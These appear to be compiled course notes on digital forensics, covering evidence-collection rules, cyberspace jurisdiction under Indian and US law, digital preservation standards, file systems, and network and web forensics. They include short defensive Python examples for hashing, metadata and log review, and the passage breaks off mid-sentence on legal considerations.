nothing in the handwritten information should be obliterated or erased. Notes and records should be
authenticated by handwritten signatures, initials, digital signatures, or other marking systems.
Discussion. As outlined in the preceding standards and criteria, evidence has value only if it can be
shown to be accurate, reliable, and controlled. A quality forensic program consists of properly trained
personnel and appropriate equipment, software, and procedures to collectively ensure these
attributes.
Comments
SWGDE’s proposed standards for the exchange of digital evidence will be posted on the National
Forensic Science Technology Center, Law Enforcement Online, and IOCE Web sites in the near
future.
Comments and questions concerning the proposed standards may be forwarded to
whitcomb@mail.ucf.edu or mpollitt.cart@fbi.gov
There are five steps in a digital forensics investigation, the first two of which are the
most critical during data acquisition (EC-Council, 2021b):
Identification
Preservation
Analysis
Documentation
Presentation
The first stage involves ensuring that all files and evidence related to the ongoing
investigation have been properly identified. This involves conducting an appropriate
examination of the device or network in question as well as interviewing the individuals
involved in the network breach. These individuals may have guidance for your
investigation or other useful information and may be able to tell you how the breach in
question occurred.
The second stage is preservation of evidence: maintaining the data in the state in which
it is found for later examination and analysis. No one else should be able to access the
information in question. After completing these steps, you can move on to copying,
examining, and analyzing the evidence.
Properly identifying and preserving evidence ensures that it can be analyzed.
Accurately identified and preserved evidence can help digital forensic investigators
understand how the data damage occurred, what hacking methods were used, and how
individuals and organizations can prevent similar cyberattacks in the future. These
conclusions must be supported by the evidence, which is confirmed in the
documentation step. All evidence is then placed into a presentation that can be given to
others.
Proper management of data acquisition is critical in any investigation. However, it is only the first step in properly conducting digital forensics and protecting your clients' information.
unit 4
1.Evidence collection
a) discuss rules of evidence
There are five rules of collecting electronic evidence. These relate to five properties that
evidence must have to be useful.
1. Admissible
2. Authentic
3. Complete
4. Reliable
5. Believable
Admissible
Admissible is the most basic rule: the evidence must be able to be used in court or otherwise. Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except that the cost is higher.
Authentic
If you can’t tie the evidence positively with the incident, you can’t use it to prove anything.
You must be able to show that the evidence relates to the incident in a relevant way.
Complete
It’s not enough to collect evidence that just shows one perspective of the incident. Not only
should you collect evidence that can prove the attacker’s actions, but also evidence that
could prove their innocence. For instance, if you can show the attacker was logged in at the
time of the incident, you also need to show who else was logged in, and why you think they
didn’t do it. This is called exculpatory evidence, and is an important part of proving a case.
Reliable
The evidence you collect must be reliable. Your evidence collection and analysis procedures must not cast doubt on the evidence's authenticity and veracity.
Believable
The evidence you present should be clearly understandable and believable by a jury.
There’s no point presenting a binary dump of process memory if the jury has no idea what it
all means. Similarly, if you present them with a formatted, human-understandable version,
you must be able to show the relationship to the original binary, otherwise there’s no way for
the jury to know whether you’ve faked it.
Using the preceding five rules, you can derive some basic do’s and don’ts:
o Account for any changes and keep detailed logs of your actions
o Be prepared to testify
o Work fast
Once you’ve created a master copy of the original data, don’t touch it or the original itself—
always handle secondary copies. Any changes made to the originals will affect the outcomes of
any analysis later done to copies. You should make sure you don’t run any programs that modify
the access times of all files (such as tar and xcopy). You should also remove any external
avenues for change and, in general, analyze the evidence after it has been collected.
Account for Any Changes and Keep Detailed Logs of Your Actions
Sometimes evidence alteration is unavoidable. In these cases, it is absolutely essential that the
nature, extent, and reasons for the changes be documented. Any changes at all should be
accounted for—not only data alteration but also physical alteration of the originals (i.e., the
removal of hardware components).
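A minimal sketch of such an action log (Python; the case number, examiner name and file names are illustrative placeholders). Each handling step is appended with a UTC timestamp so the record can later support testimony:

    from datetime import datetime, timezone

    def log_action(logfile: str, examiner: str, action: str) -> None:
        stamp = datetime.now(timezone.utc).isoformat()
        with open(logfile, "a", encoding="utf-8") as f:   # append-only record
            f.write(f"{stamp}\t{examiner}\t{action}\n")

    log_action("case_0421_log.tsv", "J. Doe", "Removed hard drive from workstation 3")
    log_action("case_0421_log.tsv", "J. Doe", "Created SHA-256 verified working copy")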
If you don’t understand what you are doing, you can’t account for any changes you make and
you can’t describe what exactly you did. If you ever find yourself “out of your depth,” either go
and learn more before continuing (if time is available) or find someone who knows the territory.
Never soldier on regardless—you’re just damaging your case.
If you fail to comply with your company’s security policy, you may find yourself with some
difficulties. Not only may you end up in trouble (and possibly fired if you’ve done something
really against policy), but also you may not be able to use the evidence you’ve gathered. If in
doubt, talk to those who know.
Capturing an accurate image of the system is related to minimizing the handling or corruption of
original data—differences between the original system and the master copy count as a change to
the data. You must be able to account for the differences.
Be Prepared to Testify
If you’re not willing to testify to the evidence you have collected, you might as well stop before
you start. Without the collector of the evidence being there to validate the documents created
during the evidence-collection process, the evidence becomes hearsay, which is inadmissible.
Remember that you may need to testify at a later time.
No one is going to believe you if they can’t replicate your actions and reach the same results.
This also means that your plan of action shouldn’t be based on trial-and-error.
Work Fast
The faster you work, the less likely the data is going to change. Volatile evidence may vanish
entirely if you don’t collect it in time. This is not to say that you should rush—you must still be
collecting accurate data. If multiple systems are involved, work on them in parallel (a team of
investigators would be handy here), but each single system should still be worked on
methodically. Automation of certain tasks makes collection proceed even faster.
You should never, ever shut down a system before you collect the evidence. Not only do you lose any volatile evidence, but the attacker may also have trojaned (replaced with trojan-horse versions) the startup and shutdown scripts, Plug-and-Play devices may alter the system configuration, and temporary file systems may be wiped out. Rebooting is even worse and should be avoided at all costs. As a
general rule, until the compromised disk is finished with and restored, it should never be used as
a boot disk.
Because the attacker may have left trojaned programs and libraries on the system, you may
inadvertently trigger something that could change or destroy the evidence you’re looking for.
Any programs you use should be on read-only media (such as a CD-ROM or a write-protected
floppy disk), and should be statically linked.
b) Jurisdiction
Jurisdiction In Cyberspace
A fast-paced world, and one that surprisingly fits in one's hand. The world is in the era of the internet and cyberspace, and it seems faster and better than ever. But it all comes at a price that mankind is still exploring. Just as in the real, physical world, the virtual space created by humans sees a plethora of criminal activities on a day-to-day basis, where the data of millions of people acts as a valuable asset. That data has the power to instigate a civil war or destroy nations altogether, to be stolen for ransom, or to rob millions from a bank in seconds. It becomes quite a challenge to map out a conclusive set of applicable laws to contain this mass virtual force, the major obstacle being how personal jurisdiction is to be applied when these offences are prosecuted.
This article breaks down how the legal principles have evolved while determining
personal jurisdiction in cyberspace.
While cyberspace and the internet share very similar connotations, cyberspace can be defined as anything that is done using the internet, while the internet is a network of networks.
In layman terms “cyberspace” is a virtual universe made up of the widely spread and
interconnected digital gadgets and technology, enabling one to create, modify, share,
exchange, extract and destroy the physical resources floating all over the internet.
The world we live in is possibly at its simplest yet most sophisticated point in time, and we can only hope for it to keep making innovative new changes. The world seems so much smaller at our fingertips, and lives have collectively become easier. Education, e-commerce, shopping, banking, and almost every other essential has taken its spot on the internet. In fact, some of the richest multinational companies, such as Google and Facebook, are empires built virtually on nothing but data: their huge numbers of users are the customers, and the users' personal information is the asset. Each of these businesses runs on loads of information, some private, some not, and it becomes necessary to build a hyper-vigilant screening process before providing our personal information, because of the immense threats that tag along with this mighty tool.
With business transactions moving online, the conventional methods of dealing with
legal complications are also in need of remoulding to fit into the present, needful
circumstances.
It is often very ambiguous to decipher what place holds jurisdiction over disputes that
arise in the vast cyberspace. In her paper “Principles of Jurisdiction”, Betsy
Rosenblatt states that “a court must first decide “where” the internet conduct takes
place, and what it means for internet activity to have an “effect” within a state or a
nation”. [1]
Cyberattacks can range from personal data breaches to mass frauds, each of which is
equally dangerous and harmful, putting one’s usage of cyberspace at risk.
Cyberattacks occur when internet users use malicious maneuvers to steal, destroy, expose, or gain unauthorized access to the personal information of a person, a company, military databases, etc.
Due to its versatile and inconsistent nature, absence of physical boundaries and
dynamic space structures, containing cyberspace in the bounds of a few specific laws
and assigning jurisdiction becomes quite a task.
Hence, a resident shall inevitably be tried under municipal laws, but ambiguity persists when dealing with non-residents.
A US federal court, in Zippo Manufacturing Co. v. Zippo Dot Com, Inc., later laid down the “Zippo test” or the “Sliding Scale test”: “In the absence of general jurisdiction, specific jurisdiction permits a court to exercise personal jurisdiction over a non-resident defendant for forum-related activities where the relationship between the defendant and the forum falls within the ‘minimum contacts’ framework”, and classified websites as (i) passive, (ii) interactive and (iii) integral to the defendant’s business.
The difficulty experienced with the application of the Zippo sliding scale test paved
the way for the application of “the effects test”. The courts have thus moved from a
‘subjective territoriality’ test to an ‘objective territoriality’ or ‘the effects test’ in
which the forum court will exercise jurisdiction if it is shown that effects of the
defendant’s website are felt in the forum state. In other words, it must have resulted in
some harm or injury to the plaintiff within the territory of the forum state- as
pronounced primarily in Calder v. Jones.
The recent lawsuit by the International League Against Racism and Anti-Semitism
and the Union of French Law Students against Yahoo!, (Yahoo! Inc., v La Ligue
Contre Le Racisme Et L’Antisémitisme), which has received a lot of attention in the
popular press summarizes the difficulties that remain in resolving both the
prescriptive and enforcement jurisdictional issues in cyberspace.
It appears that courts and legislatures have found legitimate grounds for asserting
prescriptive jurisdiction over defendants based upon actions taken in cyberspace, but
that may have little importance when the plaintiff seeks a restorative remedy.
Enforcement jurisdiction, which requires the injured party to attach either the
defendant or his tangible assets, becomes an issue of comity or state’s recognition of
its obligation to enforce a law. [4]
“In sum, under U.S. law. if it is reasonable to do so, a court in one state will exercise
jurisdiction over a party in another state or country whose conduct has substantial
effects in the state and whose conduct constitutes sufficient contacts with the state to
satisfy due process. Because this jurisdictional test is ambiguous, courts in every state
of the U.S. may be able to exercise jurisdiction over parties anywhere in the world,
based solely on Internet contacts with the state.”[5]
Germany has passed a law that subjects any Web site accessible in Germany to
German law, holding Internet service providers (ISPs) liable for violations of German
content laws if the providers were aware of the content and were reasonably able to
remove the content. [6]
Malaysia’s new cyberspace law also extends well beyond the borders of Malaysia.
The bill applies to offenses committed by a person in any place, inside or outside of
Malaysia, if at the relevant time the computer, program, or data was either (i) in
Malaysia or (ii) capable of being connected to or sent to or used by or with a computer
in Malaysia. The offender is liable regardless of his nationality or citizenship. [7]
Personal Jurisdiction in Cyberspace- The Indian
Mechanism
In Casio India Co. Limited v. Ashita Tele Systems Pvt. Limited, the Delhi High Court held that the fact that “the website of Defendant can be accessed from Delhi is sufficient to invoke the territorial jurisdiction of this Court”. [8]
In India TV Independent News Service Pvt. Limited v. India Broadcast Live Llc &
Ors., it was held that “the Defendant is carrying on activities within the jurisdiction of
this court; has sufficient contacts with the jurisdiction of the court and the claim of the
Plaintiff has arisen as a consequence of the activities of Defendant, within the
jurisdiction of this court”.
In Banyan Tree Holding (P) Limited v. A. Murali Krishna Reddy, the Division Bench of the Delhi High Court, while answering the referral order of the learned Single Judge, affirmed the ruling in India TV and overruled the Casio judgement. [9]
Various laws in India can be deemed applicable to today’s scenario of cyberspace and
everything that is involved with it. It is fascinating to notice how some of these laws,
though decades old, stand accurate to today’s circumstances.
Under Sections 15 to 20 of the Code of Civil Procedure, 1908, which stipulate the Indian approach to determining jurisdiction, jurisdiction is determined by the location of the immovable property, or the place of residence or work of the defendant, or the place where the cause of action has arisen. These provisions stand largely inapplicable to cyberspace disputes.
The Code of Criminal Procedure, 1973 prescribes multiple possible places of jurisdiction, based on the place of commission of a crime or the place where its consequence occurs in cases of a continuing crime, which, in the case of cyberspace, stands accurate.
The persisting laws relating to cyberspace are dealt under the Information Technology
Act, 2000, in India. The objective of the Act is to provide legal recognition to e-
commerce and to facilitate storage of electronic records with the Government.
The Act provides various definitions and instances of cybercrimes, prescribing the
punishment for those crimes and also provides laws for trial of cyber law cases in and
out of the country.
Sec 1 of the IT Act states that, this Act extends to the whole of India and, unless
otherwise provided, it shall also apply to any offence or contravention committed
outside India by any person.
Sec 75 of the IT Act provides that the Act applies to offences or contraventions committed outside India by any person, irrespective of nationality, if the act or conduct constituting the offence or contravention involves a computer, computer system or computer network located in India.
As much as the Information Technology Act 2000 seems inclusive, it still poses ambiguity in jurisdiction when the offence has been committed outside of India or by a non-citizen, while also following the principle of lex fori, meaning the law of the forum. [10]
Apart from the IT Act 2000, there is other relevant legislation under Indian law that gives Indian courts the authority to adjudicate matters related to cyber-crimes, such as:
Sections 3 and 4 of the Indian Penal Code, 1860, which deal with the extra-territorial jurisdiction of Indian courts.
Section 188 of the Code of Criminal Procedure, 1973 provides that even if a citizen of India commits an offence outside the country, it remains subject to the jurisdiction of courts in India.
Section 178 deals with a crime, or part of a crime, committed in India, and Section 179 deals with the consequences of a crime occurring in Indian territory.
Conclusion
Cyberspace – a word borrowed from fiction – has made its presence felt in reality for almost everyone. It is not a luxury but a bare necessity for people of all ages, and it has the entire world to offer, one simple click away.
Artsy and simplistic is how cyberspace feels, and as technology evolves, giving mankind its best, the crimes relating to cyberspace are also rising drastically. The more advanced cyberspace gets, the more advanced its disputes. The existence of a virtual space creates a cape of invisibility for those who wish to misuse this innovation. It is troubling to observe that, since cyberspace and the internet are ever-evolving entities, the laws to deal with mishaps occurring in them are formulated long after the damage is done. Because of cyberspace's constant development and ease of change, laws and lawmakers are often stuck at war to propose an accurate way of addressing these offences. Oftentimes, these offences turn grave and brutal, threatening people's safety and lives, compromising military information at the cost of a nation's security, or defrauding large numbers of people, among other harms.
It is crucial to learn that creating a well-developed set of consistent laws is the only way to battle the bigger evils that could arise out of cyberspace and its invisible pursuits.
FAQs
1. Why Is There A Need For Personal Jurisdiction In Cyberspace?
Cyberspace is a dynamic entity that advances by the second. There is a newer innovation every day, making technology easier, but each innovation brings its own set of problems: the newer the innovations, the newer the ways to commit offences in cyberspace. This calls for close inspection of cyberspace and for regulating and resolving its disputes in effective new ways with the help of effective, newer laws.
References
https://blog.ipleaders.in/cyber-security-and-its-legal-implications/
Introduction
The use and development of reliable standards has long been a cornerstone of the information
industry. They facilitate the access, discovery and sharing of digital resources, as well as their long-
term preservation. There are both generic standards applicable to all sectors that can support digital
preservation, and industry-specific standards that may need to be adhered to. Using standards that
are relevant to the digital institutional environment helps with organisational compliance and
interoperability between diverse systems within and beyond the sector. Adherence to standards also
enables organisations to be audited and certified.
Operational standards
There are a number of standards which can help with the development of an operational model for
digital preservation.
Taking custodial control of digital materials requires a set of procedures to govern their transfer into
a digital preservation environment. This can include identifying and quantifying the materials to be
transferred, assessing the costs of preserving them and identifying the requirements for future
authentication and confidentiality. ISO 20652: Space Data and Information Transfer Systems -
Producer-Archive Interface - Methodology Abstract Standard (ISO, 2006) is an international standard
that provides a methodological framework for developing procedures for the formal transfer of digital
materials from the creator into the digital preservation environment. Objectives, actions and the
expected results are identified for four phases - initial negotiations with the creator (Preliminary
Phase), defining requirements (Formal Definition Phase), the transfer of digital materials to the
digital preservation environment (Transfer Phase) and ensuring the digital materials and their
accompanying metadata conform to what was agreed (Validation Phase).
ISO 14721:2012 Space Data and Information Transfer Systems - Open Archival Information System
- Reference Model (OAIS) (ISO, 2012b) provides a systematic framework for understanding and
implementing the archival concepts needed for long-term digital information preservation and
access, and for describing and comparing architectures and operations of existing and future
archives. It describes roles, processes and methods for long-term preservation. Developed by the
Consultative Committee for Space Data Systems (CCSDS) OAIS was first published in 1999 and
has had an influence upon many digital preservation developments since the early 2000s. A useful
introductory guide to the standard is available as a DPC Technology Watch Report (Lavoie, 2014).
An OAIS is ‘an archive, consisting of an organization of people and systems that has accepted the
responsibility to preserve information and make it available for a defined ‘Designated Community’.
An ‘OAIS archive’ is distinguished from other uses of the term ‘archive’ by the way it accepts and responds to a series of specific mandatory responsibilities defined by the standard.
OAIS also defines the information model that needs to be adopted. This includes not only the digital
material but also any metadata used to describe or manage the material and any other supporting
information called Representation Information.
The OAIS functional model is widely used to establish workflows and technical implementations. It
defines a broad range of digital preservation functions including ingest, access, archival storage,
preservation planning, data management and administration. These provide a common set of
concepts and definitions that can assist discussion across sectors and professional groups and
facilitate the specification of archives and digital preservation systems.
OAIS provides a high level framework and a useful shared language for digital preservation but for
many years the concept of ‘OAIS conformance/compliance’ remained hard to pin down. Though the
term was frequently used in the years immediately following the publication of the standard, it relied
on the ability to measure up to just six mandatory but high level responsibilities. A more detailed
discussion about ‘OAIS compliance’ can be found in the Technology Watch Report.
ISO 15489:2001 Information and documentation -- Records management (ISO, 2001) can also be a
useful standard for defining the roles, processes and methods for a digital preservation
implementation where the focus is the long-term management of records. This standard outlines a
framework of best practice for managing business records to ensure that they are curated and
documented throughout their lifecycle while remaining authoritative and accessible.
ISO 16175:2011 Principles and functional requirements for records in electronic office environments
(ISO, 2011) relates to electronic document and records management systems as well as enterprise
content management systems. While it does not include specific requirements for digital
preservation, it does acknowledge the need to maintain records over time and that format
obsolescence issues need to be considered in the specification of these electronic systems.
There are international standards that are generic to good business management that may also be
relevant in the digital preservation domain.
Certification against ISO 9001 Quality management systems (ISO, 2015) demonstrates an
organisation’s ability to provide and improve consistent products and services.
Certification against ISO/IEC 27001 Information technology -- Security techniques -- Information
security management systems (ISO/IEC, 2013) demonstrates that digital materials are securely
managed ensuring their authenticity, reliability and usability.
ISO/IEC 15408 The Common Criteria for Information Technology Security Evaluation (ISO/IEC,
2009) provides a standardised framework for specifying functional and assurance requirements for IT
security and a rigorous evaluation of these.
There are a number of routes through which a digital preservation implementation can be certified.
These range from light touch peer review certification methods such as the Data Seal of Approval,
through the more extensive internal methods of DIN 31644 Information and documentation - Criteria
for trustworthy digital archives (DIN, 2012), to the comprehensive international standard ISO
16363:2012 Audit and certification of trustworthy digital repositories (ISO, 2012a) (see Audit and
certification).
Technical standards
There are specific advantages to using standards for the technical aspects of a digital preservation
programme, primarily in relation to metadata and file formats.
In conjunction with relevant descriptive metadata standards, PREMIS and METS are de facto
standards which will enhance a digital preservation programme. PREMIS (PREservation Metadata:
Implementation Strategies) is a standard hosted by the Library of Congress and first published in
2005. The data dictionary and supporting tools have been specifically developed to support the
preservation of digital material. METS (Metadata Encoding and Transmission Standard) is an XML
encoding standard which enables digital materials to be packaged with archival information
(see Metadata and documentation).
There are also standards relating to file formats. Choosing file formats that are non-proprietary and
based on open format standards gives an organisation a good basis for a digital preservation
programme. ISO/IEC 26300-1:2015 Open Document Format for Office Applications (ISO/IEC, 2015)
provides an XML schema for the preservation of widely used documents such as text documents,
spreadsheets, presentations. ISO 19005 Electronic document file format for long-term preservation
(ISO, 2005) prescribes elements of valid PDF/A which ensures that they are self-contained and
display consistently across different devices. Aspects of JPEG-2000 and TIFF are also covered by
ISO standards. (see File formats and standards).
Barriers to using standards
A standards based approach to digital preservation is important, but there are also factors which
inhibit their use as a digital preservation strategy:
The pace of change is so rapid that standards which have reached the stage of being formally endorsed
- a process which usually takes years - will inevitably lag behind developments and may even be
superseded.
Competitive pressures between suppliers encourage the development of proprietary extensions to, or
implementations of standards which can dilute the advantages of consistency and interoperability for
preservation.
The standards themselves adapt and change to new technological environments, leading to a number
of variations of the original standard which may or may not be interoperable in the long-term even if
they are backwards compatible in the short-term.
Standards can be intimidating to read and resource intensive to implement.
In such a changeable and highly distributed environment, it is impossible to be completely
prescriptive.
These factors mean that standards will need to be seen as part of a suite of preservation strategies
rather than the key strategy itself. The digital environment is not inclined to be constrained by rigid
rules and a digital preservation programme can often be a blend of standards and best practice that
is sufficiently flexible and adapted to suit the needs of the organisation, its circumstances and the
digital materials being managed.
In recent years best practice guidance and case studies have been published by national archives,
national libraries and other cultural organisations. Digital preservation is also a topic well discussed
on blogs and social media which can often provide real time information in relation to theory and
practice from around the world. Papers at conferences such as iPRES, the International Digital
Curation Conference (IDCC) and the Preservation and Archiving Special Interest Group (PASIG)
can be a useful source of up to date thinking from academics and practitioners in digital
preservation.
Specific industries have become active in the development of preservation standards, and particular
types of content and use cases have emerged that overlap and extend a number of standards.
There is considerable benefit in digital preservation standards being embedded in sector-specific
standards since this will greatly assist their adoption, although this may present a challenge to
coordination of activities. Three examples are given below:
1. Audio visual materials present a special case for digital preservation (see Moving pictures and
sounds). Recommendations for audio recordings and video recordings exist under the auspices of the
International Association of Sound and Audio-visual Archives (such as IASA- TC04, 2009), while a
range of industry bodies and content holders including the BBC, RAI, ORF and INA have formed the
PrestoCentre to progress research and development of preservation standards in this
field. https://www.prestocentre.org/
2. The aerospace industry has particular requirements in product lifecycle management and information
exchange which have given rise to a series of industry wide initiatives to standardise approaches to
aligning and sharing CAD drawings for engineering. The membership body PROSTEP created the
ISO 10303 ‘Standard for Exchange of Product Model Data’ which has developed into the LOTAR
standard (http://www.lotar-international.org/lotar-standard/overview-on-parts.html). LOTAR is
not incompatible with OAIS, but because it fits within a data exchange protocol important to the
industry, aerospace engineers are more likely to encounter LOTAR than OAIS
3. .The Storage Network Industry Association has also begun to make progress on the development of a
series of standards. A SNIA working group on long-term data retention has responsibility for both
physical and logical preservation, and the creation of reference architectures, services and interfaces
for preservation. In addition, a working group on Cloud Storage is likely to become particularly
influential in relation to preservation. Cloud architectures change how organizations view repositories
and how they access services to manage them. For example, it is unclear how one would measure the
success of a ‘trusted digital repository’ that was based in a cloud provider.
Resources
Seeing Standards: A Visualization of the Metadata Universe
http://jennriley.com/metadatamap/
The sheer number of metadata standards in the cultural heritage sector is overwhelming, and their
inter-relationships further complicate the situation. This visual map of the metadata landscape is
intended to assist planners with the selection and implementation of metadata standards. Each of
the 105 standards listed here is evaluated on its strength of application to defined categories in each
of four axes: community, domain, function, and purpose. (2010, 1 page).
D-Lib Magazine
http://www.dlib.org/dlib.html
D-Lib Magazine publishes on a regular basis a wide range of papers and case studies on the practical
implementation of digital preservation standards and best practice.
Core Trust Seal
https://www.coretrustseal.org/
PREMIS
http://www.loc.gov/standards/premis/
Digital Curation Centre
http://www.dcc.ac.uk/
The Digital Curation Centre makes available research and case studies in relation to the
preservation of research data. It also publishes recordings of its annual International Digital
Curation Conference proceedings.
The Signal
http://blogs.loc.gov/digitalpreservation/
IPRES
http://www.ipres-conference.org/
iPRES, the International Conference on Digital Preservation, publishes a website and proceedings
from its annual event, which looks at different themes within the digital preservation landscape.
Digital Preservation Coalition Wiki
http://wiki.dpconline.org/index.php?title=Main_Page
The Digital Preservation Coalition Wiki provides a collaborative space for users of OAIS, the British
Library’s file format assessments as well as other resources.
Digital Preservation Matters
http://preservationmatters.blogspot.co.uk/
The Digital Preservation Matters blog is a personal account of experiences from working with digital
preservation.
2. Evidence Analysis
A file system in a computer is the manner in which files are named and
logically placed for storage and retrieval. It can be considered as a
database or index that contains the physical location of every single
piece of data on the respective storage device, such as a hard disk, CD,
DVD or flash drive. This data is organized in folders, which are called
directories. These directories further contain folders and files.
For storing and retrieving files, file systems make use of metadata,
which includes the date the file was created, date modified, file size,
and so on. They can also restrict users from accessing a particular file
by using encryption or a password.
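
To make this concrete, the short Python sketch below (a minimal illustration with a hypothetical file name) shows the kind of file-system metadata an examiner can read programmatically:

import os, stat, time

def file_metadata(path):
    """Print basic file-system metadata, as a forensic triage script might."""
    st = os.stat(path)
    print("Size (bytes):   ", st.st_size)
    print("Last modified:  ", time.ctime(st.st_mtime))
    print("Last accessed:  ", time.ctime(st.st_atime))
    # On Windows st_ctime is the creation time; on Unix it is the inode-change time.
    print("Created/changed:", time.ctime(st.st_ctime))
    print("Permissions:    ", stat.filemode(st.st_mode))

file_metadata("example.txt")  # hypothetical file name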
File Name
o The FAT file system in Windows supports long file names, with the full file path
being as long as 255 characters.
o File names can contain more than one period and spaces. The characters that come
after the last period in the full file name are treated as the file extension.
The FAT file system does not support folder-level or local security. This means users
logged into a computer locally gain complete access to the folders and files
that lie in FAT partitions.
It provides fast access to files. The speed depends upon the partition size,
file size, file type and the number of files in a folder.
FAT32 File System
This is an advanced version of the FAT file system and can be used on
drives ranging from 512 MB to 2 TB.
Features
Easier access to files in partitions less than 500 MB or greater than 2 GB in
size
[Figure omitted: partitioning layout in the FAT and FAT32 file systems.]
NTFS File System
The NTFS File System stands for New Technology File System.
Features
Naming
NTFS supports long file names of up to 255 characters, stored in Unicode.
Files and partition sizes are far larger in NTFS than in FAT. An NTFS
partition can theoretically be as large as 16 exabytes, but in practice it is
commonly limited to 2 TB, and maximum file sizes likewise far exceed
FAT32's 4 GB per-file limit.
It provides bad-cluster mapping. This means that it can detect bad clusters
or erroneous space in the disk, retrieve the data in those clusters, and then
store it in another space. To avoid further data storage in those areas, bad
clusters are marked for errors.
Extended file system (EXT), Second Extended file system (EXT2) and
Third Extended file system (EXT3) are designed and implemented on
Linux. EXT is an old file system that was used in early Linux
systems. EXT2 is probably one of the most widely used Linux file
systems. EXT3 includes the same features as EXT2, but also
adds journaling.
Here we will talk about the most commonly used EXT2. With the
optimizations in kernel code, it provides robustness along with good
performance whilst providing standard and advanced Unix file
features.
Features
Supports standard Unix file types, i.e. regular files, device special files,
directories and symbolic links
Can manage file systems created on huge partitions. Originally, file system
size was restricted to 2 GB, but with work in the VFS layer this limit has
been increased to 4 TB.
Allows for secure deletion of files. Once data is deleted, the space is
overwritten with random data to prevent malicious users from gaining
access to the previous data.
A file format is a layout and organization of data within the file. If a file
is to be used by a program, it must be able to recognize and have
access to the data in the file. For instance, a text document can be
recognized by a program such as Microsoft Word that is designed to open
text documents, but not by a program that is designed to play audio or video files.
A file format is indicated along with the file name in the form of a file
extension. The extension contains three or four letters identifying the
format and is separated from the file name by a period.
There are many types of file formats that have their respective
programs for processing the files. Some of the common file formats
are:
Disk image file containing all the files and folders on a disk (.iso)
Compressed files that combine a number of files into one single file (.zip
and .rar)
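
Because an extension is only a naming convention, forensic tools typically also check a file's leading "magic" bytes against its claimed extension. The Python sketch below illustrates the idea; the signature table is a small, illustrative subset and the file name is hypothetical:

# Minimal sketch: compare a file's extension with its leading "magic" bytes.
MAGIC = {
    b"PK\x03\x04": ".zip",   # ZIP archives (also .docx, .xlsx, ...)
    b"Rar!":       ".rar",
    b"%PDF":       ".pdf",
    b"\x89PNG":    ".png",
}

def detect_format(path):
    with open(path, "rb") as f:
        head = f.read(8)
    for sig, ext in MAGIC.items():
        if head.startswith(sig):
            return ext
    return None

path = "report.pdf"                    # hypothetical file
claimed = "." + path.rsplit(".", 1)[-1]
actual = detect_format(path)
if actual and actual != claimed:
    print(f"Extension {claimed} does not match content signature {actual}")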
Acquisition
The system should be secured to ensure that all data and equipment
stays safe. In other words, all media required for forensic analysis
should be acquired and kept safe from any unauthorized access. Identify
all files on the computer system, including encrypted, password-
protected, hidden and deleted (but not overwritten) files. These files
must be acquired from all storage media that include hard drive and
portable media. Once acquired, forensic investigators have to make a
copy of them so that the original files are kept intact without the risk
of alteration.
Logical acquisition captures only the files that are of interest to the case. It is
used when time is limited.
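
A standard way to show that the working copy matches the original is to compare cryptographic hashes of both. A minimal Python sketch, with hypothetical image file names:

import hashlib

def sha256_of(path, chunk_size=1024 * 1024):
    """Hash a disk image in chunks so large evidence files fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

original = sha256_of("evidence.dd")       # hypothetical image of the seized drive
working  = sha256_of("evidence_copy.dd")  # the copy the analyst will examine
assert original == working, "Working copy does not match the original!"
print("Verified:", original)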
Extraction
Reconstruction
Reporting
b) Application forensics
Balancing the need for speed and careful, methodical steps.
When you suspect that an application has been compromised or a data breach has occurred, it’s
important to act quickly to preserve evidence and identify the root cause. Application forensics
involves forensic examination of applications and their contents (such as logs, security event
monitoring, databases, and config files) to trace the origin of the attack.
There are a number of specific attributes that make application forensics a specialized
discipline:
o Modern-day applications are often distributed across multiple servers, or even multiple
datacenters or cloud providers.
o Applications are often mission-critical for the business, and cannot be taken offline for image
capture and investigation.
o Applications are often backed by large databases that reside on a complex storage layer
with many physical disks.
o Application attacks don’t naturally leave a trail of evidence like other forms of attack.
c) Web forensics
Web browsing activity leaves a trail of evidence both on the client side (e.g., registry
entries, temporary files, index.dat, cookies, favorites, a list of visited
sites or partial website data downloaded to the local browser cache)
and on the server side (e.g., during log analysis on a server, you
may find valuable records such as the perpetrator's IP address, a
timestamp for each visit, what information was posted, etc.). Again, if
you have the proper tools and knowledge, once you gather this sort of
evidence, it is a great step towards building a strong case.
d) Network forensics
Most attacks move through the network before hitting the target and
they leave some trace. According to Locard’s exchange principle,
“every contact leaves a trace,” even in cyberspace.
Data enters the network en masse but is broken up into smaller pieces
called packets before traveling through the network. In order to
understand network forensics, one must first understand internet
fundamentals like common software for communication and search,
which includes emails, VOIP services and browsers. One must also
know what ISPs, IP addresses and MAC addresses are.
File transfer protocols (e.g., Server Message Block/SMB and Network File
System/NFS)
Methods
“Stop, look and listen” method: Administrators watch each data packet that
flows across the network but they capture only what is considered
suspicious and deserving of in-depth analysis. While this method does not
consume much space, it may require significant processing power.
Primary sources
Log files: These files reside on web servers, proxy servers, Active Directory
servers, firewalls, Intrusion Detection Systems (IDS), DNS and Dynamic Host
Configuration Protocol (DHCP) servers. Unlike full-packet captures, logs do
not take up as much space.
Log files provide useful information about activities that occur on the
network, like IP addresses, TCP ports and Domain Name Service
(DNS). Log files also show site names which can help forensic experts
see suspicious source and destination pairs, like if the server is
sending and receiving data from an unauthorized server somewhere in
North Korea. In addition, suspicious application activities — like a
browser using ports other than port 80, 443 or 8080 for communication
— are also found on the log files. Log analysis sometimes requires both
scientific and creative processes to tell the story of the incident.
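
As a simple illustration of that kind of log analysis, the Python sketch below flags traffic to unexpected ports; the log-line format and file name are assumptions made for the example:

import re
from collections import Counter

# Toy pattern for "SRC=1.2.3.4 DST=5.6.7.8 DPT=4444" style firewall log lines.
LINE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<port>\d+)")
EXPECTED_WEB_PORTS = {80, 443, 8080}

suspicious = Counter()
with open("firewall.log") as f:          # hypothetical log file
    for line in f:
        m = LINE.search(line)
        if m and int(m.group("port")) not in EXPECTED_WEB_PORTS:
            suspicious[(m.group("src"), m.group("dst"), m.group("port"))] += 1

for (src, dst, port), n in suspicious.most_common(10):
    print(f"{src} -> {dst}:{port} seen {n} times")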
Tools
Free software tools are available for network forensics. Some are
equipped with a graphical user interface (GUI). Most, though, only have
a command-line interface, and many only work on Linux systems.
EMailTrackerPro shows the location of the device from which the email is
sent
Web Historian provides information about the upload/download of files on
visited websites
Legal considerations
Privacy and data protection laws may pose some restrictions on active
observation and analysis of network traffic. Without explicit
